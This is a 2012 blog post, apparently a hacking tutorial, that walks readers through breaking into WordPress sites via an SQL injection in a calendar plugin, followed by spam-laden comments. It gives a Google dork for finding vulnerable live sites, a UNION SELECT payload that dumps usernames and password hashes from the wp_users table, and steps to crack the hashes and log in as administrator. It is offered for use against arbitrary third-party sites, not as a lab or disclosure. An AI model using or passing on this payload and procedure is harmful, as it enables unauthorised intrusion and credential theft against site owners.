Pages

Subscribe:

Saturday, May 19, 2012

Hack Wordpress Blog:WordPress Calendar SQL Injection Vunerablity

WP Calender is vulnerable to sql injection in wordpress. So Follow my instruction.

1. Go to www.google.com
2. Dork:"powered by WordPress" inurl:"/?event_id="
Search it google and select anyone in a new tab which you comfortable.
3. Now after 'id=' use the code which is given below.
null+and+1=2+union+select 1,concat(user_login,0x3a,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
8+from+wp_users
4. You get the username and password. Password are in hash form. Decrypt the Hash.
5. You can login in www.site.com/wp-admin

I hope you enjoy the tutorial. :-)

6 comments:

  1. yes i am impresing by your article but look like to be difficult and what is the use of this hacking? please give the details about it.

    ReplyDelete
  2. hey you provide the article but look like to be difficult and what is the use of this hacking of a wordpress blog ? please give in detail the actual work is done through this hacking.

    ReplyDelete
  3. That is very helpful for increasing my knowledge in this field. autoblog wordpress website

    ReplyDelete
  4. You are very articulate and explain your ideas and opinions clearly leaving no room for miscommunication.
    Please Kindly check My web: buy youtube comments

    ReplyDelete
  5. You are very articulate and explain your ideas and opinions clearly leaving no room for miscommunication.Please Kindly check My web:convert youtube video

    ReplyDelete
  6. You are very articulate and explain your ideas and opinions clearly leaving no room for miscommunication.Please Kindly check My web:"buy tiktok comments''

    ReplyDelete

Related Posts Plugin for WordPress, Blogger...
 

Alexa Rank

Review www.allitemz.blogspot.com on alexa.com

Total Pageviews

Your IP

what is my ip address?
back to top